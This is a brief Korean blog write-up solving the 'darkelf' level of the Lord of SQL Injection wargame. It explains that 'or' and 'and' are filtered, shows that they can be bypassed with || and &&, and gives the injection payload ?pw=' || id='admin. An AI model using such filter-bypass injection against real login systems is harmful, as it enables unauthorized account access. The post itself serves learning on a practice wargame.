WEB hacking/LORD OF SQL INJECTION

[Lord of SQL Injection] darkelf 문제 풀이

Roronoa 2023. 4. 8. 21:20
반응형

문제 정보

문제 이름 : darkelf 

문제 설명

[그림 1] darkelf 문제 접속

문제를 보면 or과 and가 필터링 되어있다.

or은 ||으로 and는 &&(%26)으로 변환하여서 우회가 가능하다.

 

[그림 2] 문제 해결

or을 || 으로 변환하여 문제를 해결하였다.

payload는 아래와 같다.

?pw=' || id='admin
반응형